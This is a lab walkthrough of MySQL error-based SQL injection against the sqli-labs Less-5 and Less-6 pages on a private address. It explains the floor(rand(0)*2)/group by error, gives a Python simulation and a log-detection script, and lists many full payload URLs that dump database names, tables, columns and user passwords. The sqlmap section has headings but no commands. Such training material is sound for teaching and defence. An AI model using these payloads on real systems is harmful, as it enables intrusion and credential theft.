I) GET error-based injection
1) Introduction to error-based injection
2) GET single-quote error-based injection (Less-5)
3) GET double-quote error-based injection (Less-6)
4) Security testing with sqlmap
II) Supplementary notes
————————————————————————————————————————————————————————
I) GET error-based injection
1) Introduction to error-based injection
Error-based injection makes the database reveal specific information through its error message. Triggering the error requires count(*), rand() and group by; none of the three can be left out. The functions commonly used in error-based injection are explained below:
rand() -- random function that returns a value between 0 and 1. It looks as if it returns a fresh random number every time, but it is driven by a random seed: with the fixed seed 0 it produces a fixed pseudo-random sequence. In other words, select rand() from users; yields different values on every run, whereas select rand(0) from users; yields a pseudo-random sequence that is the same (and therefore predictable) every time.
So why, when exploiting floor-based error injection, is rand(0) multiplied by 2? That has to be explained together with the floor function:
floor() -- rounding-down function; floor(a) returns the largest integer less than or equal to a;
floor(rand(0)*2) takes the sequence produced by rand(0), multiplies each value by 2 and rounds down, giving the pseudo-random sequence 0 1 1 0 1 1 ...;
count() -- aggregate function that returns the number of rows matched by the query;
group by -- grouping clause that groups the query result (identical values form one group);
How the error arises:
count() is a counting function. When count and group by are used together, MySQL builds a virtual (temporary) table to do the counting. The virtual table looks like this (its key column is the primary key and must not contain duplicates):
When a row is fetched, the virtual table is first checked for that record: if it is absent, a new record is inserted; if it is present, the count(*) field is simply incremented by 1. The error occurs when the third record is written to the virtual table. By that point floor(rand(0)*2) has been evaluated 5 times in total, which is why at least 3 rows of data are needed to trigger the error. (When floor(rand(0)*2) evaluates to 0 the value is discarded without further computation.)
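To make the counting argument above concrete, here is an added Python simulation (not part of the original post) of the temporary-table behaviour. It assumes the model the page's count of 5 evaluations implies: the grouping key is evaluated once for the lookup and evaluated again while a new row is inserted. It replays the 0 1 1 0 1 1 sequence the page gives for floor(rand(0)*2), and also the constant-0 sequence of floor(rand(0)) without the *2, to show why the multiplication matters.

```python
from itertools import cycle

# First values of floor(rand(0)*2) in MySQL, as given on the page: 0 1 1 0 1 1 ...
FLOOR_RAND0_X2 = (0, 1, 1, 0, 1, 1)
# Without the *2, floor(rand(0)) is always 0 because rand() never reaches 1.
FLOOR_RAND0_X1 = (0,)


def simulate_group_by(row_count, key_sequence=FLOOR_RAND0_X2):
    """Replay MySQL's GROUP BY temporary-table logic over `row_count` source rows.

    Assumed model: the grouping key is evaluated once to look it up; only when
    the key is new is it evaluated a second time while the row is inserted.
    If that second value already exists, the insert fails with a duplicate
    primary-key error. Returns (error_row, evaluations, table); error_row is
    the 1-based source row at which the error happened, or None.
    """
    keys = cycle(key_sequence)
    table = {}            # key -> count(*); key is the primary key
    evaluations = 0
    for row in range(1, row_count + 1):
        key = next(keys)  # evaluation for the lookup
        evaluations += 1
        if key in table:
            table[key] += 1          # existing group: just count it
            continue
        key = next(keys)  # new group: re-evaluated while inserting
        evaluations += 1
        if key in table:
            return row, evaluations, table   # duplicate primary key
        table[key] = 1
    return None, evaluations, table


def rows_needed_for_error(max_rows=10, key_sequence=FLOOR_RAND0_X2):
    """Smallest source-row count that triggers the error, or None within max_rows."""
    for n in range(1, max_rows + 1):
        error_row, _, _ = simulate_group_by(n, key_sequence)
        if error_row is not None:
            return n
    return None


if __name__ == "__main__":
    for n in (1, 2, 3):
        print(n, "rows ->", simulate_group_by(n))
    print("rows needed with *2:", rows_needed_for_error())                               # 3
    print("rows needed without *2:", rows_needed_for_error(key_sequence=FLOOR_RAND0_X1))  # None
```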
2) GET single-quote error-based injection
Because error-based injection does not display information directly the way the earlier union select queries did, the payload has to be built from count(), floor(), rand() and group by together:
id=-1' union select 1,2,3 from (select count(*),concat((select concat(version(),database(),user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Breakdown: peel it apart layer by layer from the outside in; it executes layer by layer from the inside out.
1) union select 1,2,3 from ()a --+
2) select count(*),concat()x from information_schema.tables group by x
3) (),floor(rand(0)*2)
4) select concat() limit 0,1   --- only the contents of this concat change, depending on what is being queried
5) version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a
Note: in concat((select concat(version(),database(),user()) limit 0,1),floor(rand(0)*2)), the inner concat joins version ~ database ~ user together, and the outer concat joins the inner concat's result with floor().
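As an added defender-side example (not from the original post), the following Python flags web-server log entries whose query string carries all three building blocks of the payload just dissected, count(*), floor(rand(0)*2) and group by, after URL-decoding twice and stripping inline comments. The log lines are constructed for this example, modelled on the Less-5/Less-6 requests in this post.

```python
import re
from urllib.parse import unquote_plus

# The three building blocks every floor/rand/group-by error payload on this page contains.
SIGNATURES = {
    "floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
}


def normalize(query):
    """Decode twice (catches double URL-encoding), drop inline comments, collapse whitespace."""
    s = unquote_plus(unquote_plus(query))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)


def matched_signatures(query):
    """Names of the signatures found in the (normalized) query string, sorted."""
    s = normalize(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(s))


def flag_error_based_sqli(log_lines):
    """Return (line, signature names) for requests that hit all three signatures."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)   # request target in combined log format
        if not m:
            continue
        names = matched_signatures(m.group(1))
        if len(names) == len(SIGNATURES):
            hits.append((line, names))
    return hits


# Constructed sample log lines: a benign request, a plain payload, and a double-encoded one.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-5/?id=1 HTTP/1.1" 200 713',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-5/?id=-1%27%20union%20select%201,2,3%20from%20(select%20count(*),concat((select%20concat(version(),0x7e,database(),0x7e,user())limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a%20--+ HTTP/1.1" 200 892',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli/Less-6/?id=-1%2522%2520and%2520(select%25201%2520from%2520(select%2520count(*),concat((select%2520version()),floor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a)%2520--%252B HTTP/1.1" 200 890',
]

if __name__ == "__main__":
    for line, names in flag_error_based_sqli(SAMPLE_LOG):
        print(names, line[:60] + "...")
```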
Less-5:
If you are not sure how the parameter is quoted, use: http://192.168.67.140/sqli/Less-5/?id=1\
Retrieve database information:
Build the URL:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all databases:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all tables in the specified database:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all columns of the specified table in the specified database:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
Dump the data:
http://192.168.67.140/sqli/Less-5/?id=-1' union select 1,2,3 from (select count(*),concat((select concat(username,0x7e,0x7e,password,0x7e,0x7e) from users limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-5/?id=-1' and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
3) GET double-quote error-based injection
Less-6:
Retrieve database information:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,0x7e,database(),0x7e,0x7e,user(),0x7e)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (select concat(0x7e,version(),0x7e,0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all databases:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(schema_name,0x7e,0x7e)from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all tables in the specified database:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x7e,0x7e)from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
List all columns of the specified table in the specified database:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x7e,0x7e) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='users' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
Dump the data:
http://192.168.67.140/sqli/Less-6/?id=-1" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from users limit 0,1) ,floor(rand(0)*2))x from information_schema.tables group by x)a --+
Or:
http://192.168.67.140/sqli/Less-6/?id=-1" and (select 1 from (select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
4) Security testing with sqlmap
Detect whether SQL injection exists:
List databases:
List tables in the specified database:
List columns in the specified table:
Dump data:
II) Supplementary notes